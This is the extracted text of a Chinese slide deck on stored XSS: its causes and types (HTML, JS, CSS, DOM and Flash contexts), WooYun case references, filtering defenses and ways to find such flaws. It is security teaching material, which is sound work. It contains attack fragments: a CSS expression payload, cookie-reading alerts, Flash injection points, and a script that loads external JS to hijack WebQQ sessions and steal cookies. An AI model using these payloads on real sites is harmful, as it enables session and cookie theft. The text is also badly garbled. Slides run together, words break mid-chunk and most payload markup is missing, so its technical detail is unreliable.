存儲(chǔ)型xss成因及挖掘方法-2003版

1、存儲(chǔ)型XSS的成因及挖掘方法USERID: Gainover ( )GROUP: PKAV Group2012-7-28 | | 什么是XSS攻擊？個(gè)人資料信息填寫(xiě)發(fā)表一篇日志發(fā)表一篇留言發(fā)表一篇評(píng)論提出一個(gè)問(wèn)題回答一個(gè)問(wèn)題.地址欄參數(shù)Dom屬性攻擊者注入惡意代碼輸入過(guò)濾輸出過(guò)濾輸入輸出代碼缺陷查看他人資料查看一篇日志查看一條留言查看一個(gè)評(píng)論查看一個(gè)問(wèn)題查看一個(gè)答案點(diǎn)開(kāi)一個(gè)鏈接點(diǎn)開(kāi)一個(gè)郵件惡意代碼執(zhí)行受害者XSS模型當(dāng)受害者變?yōu)楣粽邥r(shí)，下一輪受害者將更容易被攻擊，威力更加明顯！用戶信息私密信息：日志，相片，郵件管理信息后臺(tái)地址，管理員帳號(hào)信息甚至直接通過(guò)Ajax上傳Shell客戶端信息針對(duì)瀏

2、覽器缺陷實(shí)施攻擊突破瀏覽器的域限制360, 傲游等瀏覽器的命令執(zhí)行XSSXss蠕蟲(chóng)攻擊DDoS攻擊XSS攻擊可以用來(lái)做什么？XSS的種類劃分反射型XSSReflected XSS存儲(chǔ)型XSSStored XSS惡意代碼存放位置地址欄數(shù)據(jù)庫(kù)惡意代碼效果用戶點(diǎn)擊惡意鏈接打開(kāi)時(shí)執(zhí)行惡意代碼，隱蔽性差 用戶瀏覽帶有惡意代碼的正常頁(yè)面時(shí)觸發(fā)，隱蔽性強(qiáng) ABCD12Non-persistentPersistent反射型XSSXSS Filter掃描器WAF產(chǎn)品但是危害越來(lái)越小.但是容易被掃.但是容易被干掉XSS攻擊的現(xiàn)狀存儲(chǔ)型XSS廣泛存在存儲(chǔ)型XSS的分類輸出內(nèi)容輸出未過(guò)濾HTML-ContextJS-

3、ContextCss-Context輸出已過(guò)濾Dom-Based操作evalinnerHTMLsetTimeoutsetIntervaldocument.write根據(jù)輸出內(nèi)容所處的位置來(lái)分類。經(jīng)常需要二次過(guò)濾，但程序員忽略掉了。會(huì)自動(dòng)發(fā)生一些轉(zhuǎn)義Flash-based XSS其它/HTML文件HTML-Context 存儲(chǔ)型XSS 及 防御wooyun-2010-07831 (random_) 百度某分站存儲(chǔ)型XSS惡意代碼的輸入惡意代碼的輸出惡意代碼的執(zhí)行 替換為 判斷存在 ,禁止提交JS-Context 存儲(chǔ)型XSS 及其防御wooyun-2010-09111 (gainover) 點(diǎn)點(diǎn)

4、網(wǎng)存儲(chǔ)型XSSJS-Context 存儲(chǔ)型XSS的利用方式:閉合當(dāng)前腳本，然后輸入自定義內(nèi)容。2. 根據(jù)JS上下文，構(gòu)造正確的閉合。過(guò)濾 ,/ 替換為 (網(wǎng)易郵箱)根據(jù)實(shí)際情況，進(jìn)行過(guò)濾。通常輸出是字符串，在和之間，過(guò)濾,即可wooyun-2010-02321(Clouds) 百度貼吧存儲(chǔ)型XSSJS-Context 存儲(chǔ)型XSS 及其防御和中的XSS一樣，過(guò)濾 和 而實(shí)際上，在HTML的屬性里， 或 也是可以被執(zhí)行的！進(jìn)一步構(gòu)造利用代碼還需要將&過(guò)濾為&字符轉(zhuǎn)義 / / / /CSS-Context 存儲(chǔ)型XSS 及其防御通常情況下，可能會(huì)將過(guò)濾掉了，因而無(wú)法使用此方式1. 如果未做過(guò)濾，可

5、以用 的方式來(lái)調(diào)用CSS-Context 存儲(chǔ)型XSS的利用方式:2. 直接根據(jù)CSS上下文構(gòu)造閉合根據(jù)CSS類型對(duì)輸出進(jìn)行嚴(yán)格糾正例如：字體大小，必須為數(shù)字，圖片地址不允許出現(xiàn)非法字符IE 6, 7, 8wooyun-2010-05967 (gainover, QQ空間存儲(chǔ)型XSS)wooyun-2010-01101 (呆子不開(kāi)口, 網(wǎng)易微博換膚XSS)5. CSS-Context 存儲(chǔ)型XSS 及其防御除了.中可以被寫(xiě)入CSS數(shù)據(jù)之外，還有其它位置也可以：2. 3. import data:,*%7bx:expression(if(!window.x)%7balert(1);window.

6、x=1%7d)%7D;1. 4. XXX(郵箱XSS的最愛(ài))(部分內(nèi)容參考 )Dom-based 存儲(chǔ)型XSS 及其防御數(shù)據(jù)輸出 我是輸出 var x=$(x).value;var x=$(x).getAttribute(picurl);var obj=eval(+x+);$(result).innerHTML=x;DOM操作Dom-based 存儲(chǔ)型XSS 及其防御name 字段是昵稱，我們可以自行設(shè)置！接著我們做以下測(cè)試：Gainover Gainover對(duì)JS熟悉一點(diǎn)的則可能想到：于是，我們測(cè)試引號(hào)是否被過(guò)濾!Gainover Gainover放棄？var data=$(json).va

7、lue;wooyun-2010-09732 (gainover,百度首頁(yè)XSS后門(mén))Dom-based 存儲(chǔ)型XSS 及其防御這一類漏洞經(jīng)常出現(xiàn)的場(chǎng)景. 點(diǎn)擊查看大圖, 點(diǎn)擊播放音樂(lè),自動(dòng)播放音樂(lè)。當(dāng)用戶點(diǎn)擊查看大圖的時(shí)候，執(zhí)行的代碼往往是：function test()alert($(pic).getAttribute(bigpic);$(bigimage).innerHTML=;wooyun-2010-02490 (gainover, 騰訊微博XSS)wooyun-2010-03317 (gainover,QQ郵箱音樂(lè)功能XSS)共同點(diǎn)：讀取自定義屬性，然后進(jìn)行innerHTML操作。解決

8、方案：在讀取屬性之后，對(duì)屬性中的特殊字符進(jìn)行二次過(guò)濾。Dom-based 存儲(chǔ)型XSS 及其防御.innerHTML=uXXXX 引發(fā)的慘案wooyun-2010-08487 (gainover,騰訊WEBQQ聊天功能XSS)實(shí)際案例大多數(shù)廠商的做法將替換為將替換為/對(duì)進(jìn)行二次過(guò)濾，替換 為 wooyun-2010-010167 (imlonghao, 搜狐微博 XSS)Flash-based 存儲(chǔ)型XSS 及其防御Flash XSS存儲(chǔ)型反射型正常的存儲(chǔ)行為圖片上傳組件，視頻播放器，音樂(lè)播放器 日志HTML未過(guò)濾，或過(guò)濾不嚴(yán)FLASH相冊(cè)，對(duì)加載圖片未判斷其它一些有加載圖片功能的FLASH應(yīng)

9、用第三方插件第三方應(yīng)用sameDomain策略Flash-based 存儲(chǔ)型XSS 及其防御常規(guī)的Flash-based存儲(chǔ)型XSS1. 最低級(jí)的漏洞Always & FLASH地址任何填寫(xiě)wooyun-2010-07684 (gainover, QQ空間禮物功能XSS)wooyun-2010-08354 (gainover,百度貼吧存儲(chǔ)型XSS)2. 稍微進(jìn)化一點(diǎn)Always & FLASH地址固定 &FLASH會(huì)調(diào)用外部圖片或SWF文件正常的FLASH惡意FLASH參數(shù)?url=xxx.jpg讀取配置文件xxx.jpgwooyun-2010-01768 (p.z, 新浪微博存儲(chǔ)型XSS)w

10、ooyun-2010-01634 (p.z, 百度i貼吧存儲(chǔ)型XSS)Flash-based 存儲(chǔ)型XSS 及其防御3. 再次進(jìn)化一點(diǎn)sameDomain + 同域名下反射型FLASH XSSsameDomain策略只允許使用同域名下的FLASH文件無(wú)法執(zhí)行了吧，高枕無(wú)憂同域名下的缺陷型FLASH文件不同域名下的惡意FLASH文件程序員 B程序員 A被惡意利用同域名下允許上傳FLASH文件某黑客wooyun-2010-03314 (gainover, QQ郵箱XSS)wooyun-2010-06103 (gainover, QQ空間存儲(chǔ)型XSS)allowscriptaccess=sameDo

11、mainallowscriptaccess 默認(rèn)屬性Flash-based 存儲(chǔ)型XSS 及其防御flash.external.ExternalInterface.call(JS代碼)navigateToURL(new URLRequest(JS代碼)getURL(JS代碼);loaderInfo.parametersxxx.swf?func = JS代碼flashvars=func=JS代碼 百度應(yīng)用iframe iframe /xxx.swf合法的存儲(chǔ)行為開(kāi)發(fā)者 .黑客(本身是開(kāi)發(fā)者)攻擊反射型FLASH XSS1. FLASH開(kāi)發(fā)人員缺乏安全意識(shí)(jwplayer, open flash

12、 chart, swfupload類程序)2. FLASH XSS 可以繞過(guò)主流瀏覽器的XSS Filter3. 傳統(tǒng)掃描器不易掃描WooYun-2012-07050Wooyun-2010-07085(新浪微博，淘寶網(wǎng)Cookies盜取)Wooyun-2010-08318(gainover,百度應(yīng)用XSS)Flash-based 存儲(chǔ)型XSS 及其防御受害者 Iframe調(diào)用 (function()function j(w)window.s=document.createElement(script);window.s.src= /%2bw%2b.js;document.body.append

13、Child(window.s)j(jq);j(wq)()Flash xss /wq.js Cookie數(shù)據(jù) 獲取vfwebqq參數(shù) 設(shè)置主題調(diào)用外部JS獲取cookies劫持騰訊WEBQQ的持久劫持Wooyun-2010-07999存儲(chǔ)型XSS 的挖掘方法1. 拿著各種XSS Vector填入到輸入處，然后看頁(yè)面是否有“執(zhí)行”2. 輸入一些可能沒(méi)有被過(guò)濾的字符，/&XXXXX，看“側(cè)漏”&3. 看功能異常，看報(bào)錯(cuò)&構(gòu)造利用代碼查明缺陷檢查原因存儲(chǔ)型XSS 的挖掘方法傳統(tǒng)輸入點(diǎn)各種表單，inputtext, textarea隱藏輸入點(diǎn)Inputhidden客戶端腳本過(guò)濾進(jìn)一步測(cè)試瀏覽器調(diào)試工具 (F12)抓包工具HttpwatchFiddlerCharles4. 遭遇驗(yàn)證碼看到一些提交的隱藏參數(shù)。存儲(chǔ)型XSS 的利用找到一個(gè)XSS點(diǎn)之后alert(/xss/);alert(document.cookie);輸入點(diǎn)長(zhǎng)度限制突破長(zhǎng)度限制漏洞的利用http-only co